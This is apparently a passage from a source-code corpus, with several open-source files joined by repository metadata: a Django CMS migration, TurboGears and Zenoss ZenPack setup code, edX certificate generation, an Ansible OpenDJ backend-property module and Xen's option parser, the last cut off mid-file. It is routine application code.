'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.globalpagepermission': {
'Meta': {'object_name': 'GlobalPagePermission'},
'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_recover_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
},
'cms.page': {
'Meta': {'ordering': "('tree_id', 'lft')", 'object_name': 'Page'},
'application_urls': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'limit_visibility_in_menu': ('django.db.models.fields.SmallIntegerField', [], {'default': 'None', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'navigation_extenders': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '80', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['cms.Page']"}),
'placeholders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cms.Placeholder']", 'symmetrical': 'False'}),
'publication_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publication_end_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publisher_is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'publisher_public': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
'publisher_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'reverse_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '40', 'null': 'True', 'blank': 'True'}),
'revision_id': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'soft_root': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.pagemoderatorstate': {
'Meta': {'ordering': "('page', 'action', '-created')", 'object_name': 'PageModeratorState'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True'})
},
'cms.pagepermission': {
'Meta': {'object_name': 'PagePermission'},
'can_add': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_change_advanced_settings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_change_permissions': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'can_delete': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_move_page': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'can_view': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'grant_on': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Page']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label, 'null': 'True', 'blank': 'True'})
},
'cms.pageuser': {
'Meta': {'object_name': 'PageUser', '_ormbases': [user_orm_label]},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_users'", 'to': "orm['%s']" % user_orm_label}),
u'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['%s']" % user_orm_label, 'unique': 'True', 'primary_key': 'True'})
},
'cms.pageusergroup': {
'Meta': {'object_name': 'PageUserGroup', '_ormbases': [u'auth.Group']},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_usergroups'", 'to': "orm['%s']" % user_orm_label}),
u'group_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.Group']", 'unique': 'True', 'primary_key': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'cms.title': {
'Meta': {'unique_together': "(('language', 'page'),)", 'object_name': 'Title'},
'application_urls': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'has_url_overwrite': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'menu_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [], {'max_length': '155', 'null': 'True', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'title_set'", 'to': "orm['cms.Page']"}),
'page_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'redirect': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'cms.usersettings': {
'Meta': {'object_name': 'UserSettings'},
'clipboard': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['%s']" % user_orm_label})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['cms']
|
bsd-3-clause
|
izak/xhtml2pdf
|
demo/tgpisa/tgpisa/commands.py
|
155
|
1630
|
# -*- coding: utf-8 -*-
"""This module contains functions called from console script entry points."""
import os
import sys
from os.path import dirname, exists, join
import pkg_resources
pkg_resources.require("TurboGears")
import turbogears
import cherrypy
cherrypy.lowercase_api = True
class ConfigurationError(Exception):
pass
def start():
"""Start the CherryPy application server."""
setupdir = dirname(dirname(__file__))
curdir = os.getcwd()
# First look on the command line for a desired config file,
# if it's not on the command line, then look for 'setup.py'
# in the current directory. If there, load configuration
# from a file called 'dev.cfg'. If it's not there, the project
# is probably installed and we'll look first for a file called
# 'prod.cfg' in the current directory and then for a default
# config file called 'default.cfg' packaged in the egg.
if len(sys.argv) > 1:
configfile = sys.argv[1]
elif exists(join(setupdir, "setup.py")):
configfile = join(setupdir, "dev.cfg")
elif exists(join(curdir, "prod.cfg")):
configfile = join(curdir, "prod.cfg")
else:
try:
configfile = pkg_resources.resource_filename(
pkg_resources.Requirement.parse("tgpisa"),
"config/default.cfg")
except pkg_resources.DistributionNotFound:
raise ConfigurationError("Could not find default configuration.")
turbogears.update_config(configfile=configfile,
modulename="tgpisa.config")
from tgpisa.controllers import Root
turbogears.start_server(Root())
|
apache-2.0
|
anksp21/Community-Zenpacks
|
ZenPacks.community.zenAppProfiler/ZenPacks/community/zenAppProfiler/__init__.py
|
2
|
5384
|
import Globals
import os.path
skinsDir = os.path.join(os.path.dirname(__file__), 'skins')
from Products.CMFCore.DirectoryView import registerDirectory
if os.path.isdir(skinsDir):
registerDirectory(skinsDir, globals())
import transaction
from Products.ZenModel.ZenossInfo import ZenossInfo
from Products.ZenModel.ZenPack import ZenPackBase
from Products.ZenModel.ZenMenu import ZenMenu
class ZenPack(ZenPackBase):
""" ZenPack loader
"""
profilerTab = { 'id' : 'profileorganizer'
, 'name' : 'Profiles'
, 'action' : 'Profiles/viewProfileOrganizer'
, 'permissions' : ( "Manage DMD", )
}
def addProfilerTab(self,app):
dmdloc = self.dmd
finfo = dmdloc.factory_type_information
actions = list(finfo[0]['actions'])
for i in range(len(actions)):
if (self.profilerTab['id'] in actions[i].values()):
return
actions.append(self.profilerTab)
finfo[0]['actions'] = tuple(actions)
dmdloc.factory_type_information = finfo
transaction.commit()
def rmvProfilerTab(self,app):
dmdloc = self.dmd
finfo = dmdloc.factory_type_information
actions = list(finfo[0]['actions'])
for i in range(len(actions)):
if (self.profilerTab['id'] in actions[i].values()):
actions.remove(self.profilerTab)
finfo[0]['actions'] = tuple(actions)
dmdloc.factory_type_information = finfo
transaction.commit()
def installMenus(self,app):
dmdloc = self.dmd
self.removeMenus(dmdloc)
modulemenu = ZenMenu('ModuleMenu')
dmdloc.zenMenus._setObject(modulemenu.id, modulemenu)
modulemenu = dmdloc.zenMenus._getOb(modulemenu.id)
modulemenu.manage_addZenMenuItem('addModule',
action='dialog_addModule', # page template that is called
description='Add Ruleset',
ordering=4.0,
isdialog=True)
modulemenu.manage_addZenMenuItem('removeModule',
action='dialog_removeModule', # page template that is called
description='Remove Ruleset',
ordering=3.0,
isdialog=True)
modulemenu.manage_addZenMenuItem('runAllMembershipRules',
action='dialog_runAllMembershipRules', # page template that is called
description='Build All Memberships',
ordering=2.0,
isdialog=True)
modulemenu = ZenMenu('RuleDefinitions')
dmdloc.zenMenus._setObject(modulemenu.id, modulemenu)
modulemenu = dmdloc.zenMenus._getOb(modulemenu.id)
modulemenu.manage_addZenMenuItem('addRule',
action='dialog_addRule', # page template that is called
description='Add Rule',
ordering=4.0,
isdialog=True)
modulemenu.manage_addZenMenuItem('removeRule',
action='dialog_removeRule', # page template that is called
description='Remove Rule',
ordering=3.0,
isdialog=True)
modulemenu = ZenMenu('RuleModule')
dmdloc.zenMenus._setObject(modulemenu.id, modulemenu)
modulemenu = dmdloc.zenMenus._getOb(modulemenu.id)
modulemenu.manage_addZenMenuItem('runAllMembershipRules',
action='dialog_runModuleMembershipRules', # page template that is called
description='Build Memberships',
ordering=2.0,
isdialog=True)
modulemenu.manage_addZenMenuItem('buildAlerts',
action='dialog_buildModuleAlerts', # page template that is called
description='Build Alerts',
ordering=1.0,
isdialog=True)
def removeMenus(self, dmd):
try:
self.dmd.zenMenus._delObject('ModuleMenu')
except AttributeError:
pass
try:
self.dmd.zenMenus._delObject('RuleDefinitions')
except AttributeError:
pass
try:
self.dmd.zenMenus._delObject('RuleModule')
except AttributeError:
pass
def install(self, app):
ZenPackBase.install(self, app)
self.addProfilerTab(app)
self.installMenus(app.zport.dmd)
def upgrade(self, app):
ZenPackBase.upgrade(self, app)
self.addProfilerTab(app)
self.installMenus(app.zport.dmd)
def remove(self, app, junk):
self.rmvProfilerTab(app)
self.dmd._delObject('Profiles')
self.removeMenus(self.zport.dmd)
#ZenPackBase.remove(self, app, junk)
#ZenPackBase.remove(self.app, leaveObjects)
|
gpl-2.0
|
eduNEXT/edx-platform
|
lms/djangoapps/certificates/generation.py
|
2
|
6695
|
"""
Course certificate generation
These methods generate course certificates (they create a new course certificate if it does not yet exist, or update the
existing cert if it does already exist).
For now, these methods deal primarily with allowlist certificates, and are part of the V2 certificates revamp.
These methods should be called from tasks.
"""
import logging
from uuid import uuid4
from common.djangoapps.student.models import CourseEnrollment, UserProfile
from lms.djangoapps.certificates.data import CertificateStatuses
from lms.djangoapps.certificates.models import GeneratedCertificate
from lms.djangoapps.certificates.queue import XQueueCertInterface
from lms.djangoapps.certificates.utils import (
emit_certificate_event,
has_html_certificates_enabled
)
from lms.djangoapps.grades.api import CourseGradeFactory
from lms.djangoapps.instructor.access import list_with_level
from openedx.core.djangoapps.content.course_overviews.api import get_course_overview_or_none
log = logging.getLogger(__name__)
def generate_course_certificate(user, course_key, status, generation_mode):
"""
Generate a course certificate for this user, in this course run. If the certificate has a passing status, also emit
a certificate event.
Note that the certificate could be either an allowlist certificate or a "regular" course certificate; the content
will be the same either way.
Args:
user: user for whom to generate a certificate
course_key: course run key for which to generate a certificate
status: certificate status (value from the CertificateStatuses model)
generation_mode: Used when emitting an events. Options are "self" (implying the user generated the cert
themself) and "batch" for everything else.
"""
cert = _generate_certificate(user, course_key, status)
if CertificateStatuses.is_passing_status(cert.status):
# Emit a certificate event
event_data = {
'user_id': user.id,
'course_id': str(course_key),
'certificate_id': cert.verify_uuid,
'enrollment_mode': cert.mode,
'generation_mode': generation_mode
}
emit_certificate_event(event_name='created', user=user, course_id=course_key, event_data=event_data)
elif CertificateStatuses.unverified == cert.status:
cert.mark_unverified(source='certificate_generation')
return cert
def _generate_certificate(user, course_key, status):
"""
Generate a certificate for this user, in this course run.
"""
# Retrieve the existing certificate for the learner if it exists
existing_certificate = GeneratedCertificate.certificate_for_student(user, course_key)
profile = UserProfile.objects.get(user=user)
profile_name = profile.name
course_grade = CourseGradeFactory().read(user, course_key=course_key)
enrollment_mode, __ = CourseEnrollment.enrollment_mode_for_user(user, course_key)
# Retain the `verify_uuid` from an existing certificate if possible, this will make it possible for the learner to
# keep the existing URL to their certificate
if existing_certificate and existing_certificate.verify_uuid:
uuid = existing_certificate.verify_uuid
else:
uuid = uuid4().hex
cert, created = GeneratedCertificate.objects.update_or_create(
user=user,
course_id=course_key,
defaults={
'user': user,
'course_id': course_key,
'mode': enrollment_mode,
'name': profile_name,
'status': status,
'grade': course_grade.percent,
'download_url': '',
'key': '',
'verify_uuid': uuid,
'error_reason': ''
}
)
if created:
created_msg = 'Certificate was created.'
else:
created_msg = 'Certificate already existed and was updated.'
log.info(f'Generated certificate with status {cert.status} for {user.id} : {course_key}. {created_msg}')
return cert
def generate_user_certificates(student, course_key, insecure=False, generation_mode='batch', forced_grade=None):
"""
It will add the add-cert request into the xqueue.
A new record will be created to track the certificate
generation task. If an error occurs while adding the certificate
to the queue, the task will have status 'error'. It also emits
`edx.certificate.created` event for analytics.
This method has not yet been updated (it predates the certificates revamp). If modifying this method,
see also generate_user_certificates() in generation_handler.py (which is very similar but is not called from a
celery task). In the future these methods will be unified.
Args:
student (User)
course_key (CourseKey)
Keyword Arguments:
insecure - (Boolean)
generation_mode - who has requested certificate generation. Its value should `batch`
in case of django command and `self` if student initiated the request.
forced_grade - a string indicating to replace grade parameter. if present grading
will be skipped.
"""
beta_testers_queryset = list_with_level(course_key, 'beta')
if beta_testers_queryset.filter(username=student.username):
log.info(f"Canceling Certificate Generation task for user {student.id} : {course_key}. User is a Beta Tester.")
return
xqueue = XQueueCertInterface()
if insecure:
xqueue.use_https = False
course_overview = get_course_overview_or_none(course_key)
if not course_overview:
log.info(f"Canceling Certificate Generation task for user {student.id} : {course_key} due to a missing course"
f"overview.")
return
generate_pdf = not has_html_certificates_enabled(course_overview)
cert = xqueue.add_cert(
student,
course_key,
generate_pdf=generate_pdf,
forced_grade=forced_grade
)
log.info(f"Queued Certificate Generation task for {student.id} : {course_key}")
# If cert_status is not present in certificate valid_statuses (for example unverified) then
# add_cert returns None and raises AttributeError while accessing cert attributes.
if cert is None:
return
if CertificateStatuses.is_passing_status(cert.status):
emit_certificate_event('created', student, course_key, course_overview, {
'user_id': student.id,
'course_id': str(course_key),
'certificate_id': cert.verify_uuid,
'enrollment_mode': cert.mode,
'generation_mode': generation_mode
})
return cert.status
|
agpl-3.0
|
ar7z1/ansible
|
lib/ansible/modules/identity/opendj/opendj_backendprop.py
|
77
|
6939
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2016, Werner Dijkerman ([email protected])
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: opendj_backendprop
short_description: Will update the backend configuration of OpenDJ via the dsconfig set-backend-prop command.
description:
- This module will update settings for OpenDJ with the command set-backend-prop.
- It will check first via de get-backend-prop if configuration needs to be applied.
version_added: "2.2"
author:
- Werner Dijkerman (@dj-wasabi)
options:
opendj_bindir:
description:
- The path to the bin directory of OpenDJ.
required: false
default: /opt/opendj/bin
hostname:
description:
- The hostname of the OpenDJ server.
required: true
port:
description:
- The Admin port on which the OpenDJ instance is available.
required: true
username:
description:
- The username to connect to.
required: false
default: cn=Directory Manager
password:
description:
- The password for the cn=Directory Manager user.
- Either password or passwordfile is needed.
required: false
passwordfile:
description:
- Location to the password file which holds the password for the cn=Directory Manager user.
- Either password or passwordfile is needed.
required: false
backend:
description:
- The name of the backend on which the property needs to be updated.
required: true
name:
description:
- The configuration setting to update.
required: true
value:
description:
- The value for the configuration item.
required: true
state:
description:
- If configuration needs to be added/updated
required: false
default: "present"
'''
EXAMPLES = '''
- name: "Add or update OpenDJ backend properties"
action: opendj_backendprop
hostname=localhost
port=4444
username="cn=Directory Manager"
password=password
backend=userRoot
name=index-entry-limit
value=5000
'''
RETURN = '''
'''
from ansible.module_utils.basic import AnsibleModule
class BackendProp(object):
def __init__(self, module):
self._module = module
def get_property(self, opendj_bindir, hostname, port, username, password_method, backend_name):
my_command = [
opendj_bindir + '/dsconfig',
'get-backend-prop',
'-h', hostname,
'--port', str(port),
'--bindDN', username,
'--backend-name', backend_name,
'-n', '-X', '-s'
] + password_method
rc, stdout, stderr = self._module.run_command(my_command)
if rc == 0:
return stdout
else:
self._module.fail_json(msg="Error message: " + str(stderr))
def set_property(self, opendj_bindir, hostname, port, username, password_method, backend_name, name, value):
my_command = [
opendj_bindir + '/dsconfig',
'set-backend-prop',
'-h', hostname,
'--port', str(port),
'--bindDN', username,
'--backend-name', backend_name,
'--set', name + ":" + value,
'-n', '-X'
] + password_method
rc, stdout, stderr = self._module.run_command(my_command)
if rc == 0:
return True
else:
self._module.fail_json(msg="Error message: " + stderr)
def validate_data(self, data=None, name=None, value=None):
for config_line in data.split('\n'):
if config_line:
split_line = config_line.split()
if split_line[0] == name:
if split_line[1] == value:
return True
return False
def main():
module = AnsibleModule(
argument_spec=dict(
opendj_bindir=dict(default="/opt/opendj/bin", type="path"),
hostname=dict(required=True),
port=dict(required=True),
username=dict(default="cn=Directory Manager", required=False),
password=dict(required=False, no_log=True),
passwordfile=dict(required=False, type="path"),
backend=dict(required=True),
name=dict(required=True),
value=dict(required=True),
state=dict(default="present"),
),
supports_check_mode=True,
mutually_exclusive=[['password', 'passwordfile']],
required_one_of=[['password', 'passwordfile']]
)
opendj_bindir = module.params['opendj_bindir']
hostname = module.params['hostname']
port = module.params['port']
username = module.params['username']
password = module.params['password']
passwordfile = module.params['passwordfile']
backend_name = module.params['backend']
name = module.params['name']
value = module.params['value']
state = module.params['state']
if module.params["password"] is not None:
password_method = ['-w', password]
elif module.params["passwordfile"] is not None:
password_method = ['-j', passwordfile]
opendj = BackendProp(module)
validate = opendj.get_property(opendj_bindir=opendj_bindir,
hostname=hostname,
port=port,
username=username,
password_method=password_method,
backend_name=backend_name)
if validate:
if not opendj.validate_data(data=validate, name=name, value=value):
if module.check_mode:
module.exit_json(changed=True)
if opendj.set_property(opendj_bindir=opendj_bindir,
hostname=hostname,
port=port,
username=username,
password_method=password_method,
backend_name=backend_name,
name=name,
value=value):
module.exit_json(changed=True)
else:
module.exit_json(changed=False)
else:
module.exit_json(changed=False)
else:
module.exit_json(changed=False)
if __name__ == '__main__':
main()
|
gpl-3.0
|
koushikcgit/xen
|
tools/python/xen/xm/opts.py
|
43
|
17981
|
#============================================================================
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#============================================================================
# Copyright (C) 2004, 2005 Mike Wray <[email protected]>
# Copyright (C) 2005 XenSource Ltd.
#============================================================================
"""Object-oriented command-line option support.
"""
import getopt
import os
import os.path
import sys
import types
def _line_wrap(text, width = 70):
lines = []
current_line = ''
words = text.strip().split()
while words:
word = words.pop(0)
if len(current_line) + len(word) + 1 < width:
current_line += word + ' '
else:
lines.append(current_line.strip())
current_line = word + ' '
if current_line:
lines.append(current_line.strip())
return lines
def wrap(text, width = 70):
""" Really basic textwrap. Useful because textwrap is not available
for Python 2.2, and textwrap.wrap ignores newlines in Python 2.3+.
"""
if len(text) < width:
return [text]
lines = []
for line in text.split('\n'):
lines += _line_wrap(line, width)
return lines
class OptionError(Exception):
def _get_message(self):
return self.__message
def _set_message(self, value):
self.__message = value
message = property(_get_message, _set_message)
"""Denotes an error in option parsing."""
def __init__(self, message, usage = ''):
self.message = message
self.usage = usage
Exception.__init__(self, message)
def __str__(self):
return self.message
class XMLFileError(Exception):
"""Thrown is input is an XML File"""
def __init__(self, XMLFile):
self.XMLFile = XMLFile
def __str__(self):
return "XMLFileError: %s" % self.XMLFile
def getFile(self):
return self.XMLFile
class Opt:
"""An individual option.
"""
def __init__(self, opts, name, short=None, long=None,
val=None, fn=None, use=None, default=None):
"""Create an option.
opts parent options object
name name of the field it controls
short short (1-char) command line switch (optional)
long long command-line switch. Defaults to option name.
val string used to print option args in help.
If val is not specified the option has no arg.
fn function to call when the option is specified.
use usage (help) string
default default value if not specified on command-line
"""
self.opts = opts
self.name = name
self.short = short
if long is None:
long = name
self.long = long
self.val = val
self.use = use
self.default = default
self.optkeys = []
if self.short:
self.optkeys.append('-' + self.short)
if self.long:
self.optkeys.append('--' + self.long)
self.fn = fn
self.specified_opt = None
self.specified_val = None
self.value = None
self.set(default)
def reset(self):
self.specified_opt = None
self.specified_val = None
self.value = None
self.set(self.default)
def __repr__(self):
return self.name + '=' + str(self.specified_val)
def __str__(self):
""" Formats the option into:
'-k, --key description'
"""
PARAM_WIDTH = 20
if self.val:
keys = ', '.join(['%s=%s' % (k, self.val) for k in self.optkeys])
else:
keys = ', '.join(self.optkeys)
desc = wrap(self.use, 55)
if len(keys) > PARAM_WIDTH:
desc = [''] + desc
wrapped = ('\n' + ' ' * (PARAM_WIDTH + 1)).join(desc)
return keys.ljust(PARAM_WIDTH + 1) + wrapped
def set(self, value):
"""Set the option value.
"""
self.opts.setopt(self.name, value)
def get(self):
"""Get the option value.
"""
return self.opts.getopt(self.name)
def append(self, value):
"""Append a value to the option value.
"""
v = self.get() or []
v.append(value)
self.set(v)
def short_opt(self):
"""Short option spec.
"""
if self.short:
if self.val:
return self.short + ':'
else:
return self.short
else:
return None
def long_opt(self):
"""Long option spec.
"""
if self.long:
if self.val:
return self.long + '='
else:
return self.long
else:
return None
def format(self, str, start=' ', out=sys.stdout):
"""Print a string, with consistent indentation at the start of lines.
"""
lines = str.split('\n')
for l in lines:
l = l.strip()
if start:
out.write(start)
out.write(l)
out.write('\n')
def show(self, out=sys.stdout):
sep = ' '
for x in self.optkeys:
out.write(sep)
out.write(x)
sep = ', '
if self.val:
out.write(' ')
out.write(self.val)
out.write('\n')
if self.use:
self.format(self.use, out=out);
if self.val:
self.format('Default ' + str(self.default or 'None'), out=out)
def specify(self, k, v):
"""Specify the option. Called when the option is set
from the command line.
k option switch used
v optional value given (if any)
"""
if k in self.optkeys:
if self.val is None and v:
self.opts.err("Option '%s' does not take a value" % k)
self.specified_opt = k
self.specified_val = v
if self.fn:
self.fn(self, k, v)
return 1
else:
return 0
def specified(self):
"""Test whether the option has been specified: set
from the command line.
"""
return self.specified_opt
class OptVar(Opt):
"""An individual option variable.
"""
def __init__(self, opts, name,
val=None, fn=None, use=None, default=None):
"""Create an option.
opts parent options object
name name of the field it controls
val string used to print option args in help.
If val is not specified the option has no arg.
fn function to call when the option is specified.
use usage (help) string
default default value if not specified on command-line
"""
if val is None:
val = name.upper()
Opt.__init__(self, opts, name, val=val, fn=fn, use=use, default=default)
self.optkeys = []
self.optkeys.append(self.long)
def short_opt(self):
return None
def long_opt(self):
return None
def show(self, out=sys.stdout):
print >>out, ' %s=%s' % (self.optkeys[0], self.val)
if self.use:
self.format(self.use, out=out);
if self.val:
self.format('Default ' + str(self.default or 'None'), out=out)
class OptVals:
"""Class to hold option values.
"""
def __init__(self):
self.quiet = False
class Opts:
"""Container for options.
"""
imports = ["import sys",
"import os",
"import os.path",
"from xen.util.ip import *",
]
def __init__(self, use=None):
"""Options constructor.
use usage string
"""
self.use = use
# List of options.
self.options = []
# Options indexed by name.
self.options_map = {}
# Command-line arguments.
self.argv = []
# Option values.
self.vals = OptVals()
# Variables for default scripts.
self.vars = {}
# Option to use for bare words.
self.default_opt = None
def reset(self):
self.vals = OptVals()
self.vars = {}
for opt in self.options:
opt.reset()
def __repr__(self):
return '\n'.join(map(str, self.options))
def __str__(self):
options = [s for s in self.options if s.optkeys[0][0] == '-']
output = ''
if options:
output += '\nOptions:\n\n'
output += '\n'.join([str(o) for o in options])
output += '\n'
return output
def val_usage(self):
optvals = [s for s in self.options if s.optkeys[0][0] != '-']
output = ''
if optvals:
output += '\nValues:\n\n'
output += '\n'.join([str(o) for o in optvals])
output += '\n'
return output
def opt(self, name, **args):
"""Add an option.
name option name
**args keyword params for option constructor
"""
x = Opt(self, name, **args)
self.options.append(x)
self.options_map[name] = x
return x
def default(self, name):
self.default_opt = name
def getdefault(self, val):
if self.default_opt is None:
return 0
opt = self.option(self.default_opt)
return opt.set(val)
def var(self, name, **args):
x = OptVar(self, name, **args)
self.options.append(x)
self.options_map[name] = x
return x
def setvar(self, var, val):
"""Set a default script variable.
"""
self.vars[var] = val
def getvar(self, var):
"""Get a default script variable.
"""
return self.vars.get(var)
def option(self, name):
"""Get an option (object).
"""
return self.options_map.get(name)
def setopt(self, name, val):
"""Set an option value.
An option can also be set using 'opts.vals.name = val'.
"""
setattr(self.vals, name, val)
def getopt(self, name):
"""Get an option value.
An option value can also be got using 'opts.vals.name'.
"""
return getattr(self.vals, name)
def specified(self, name):
"""Test if an option has been specified.
"""
opt = self.option(name)
return opt and opt.specified()
def err(self, msg):
"""Print an error to stderr and exit.
"""
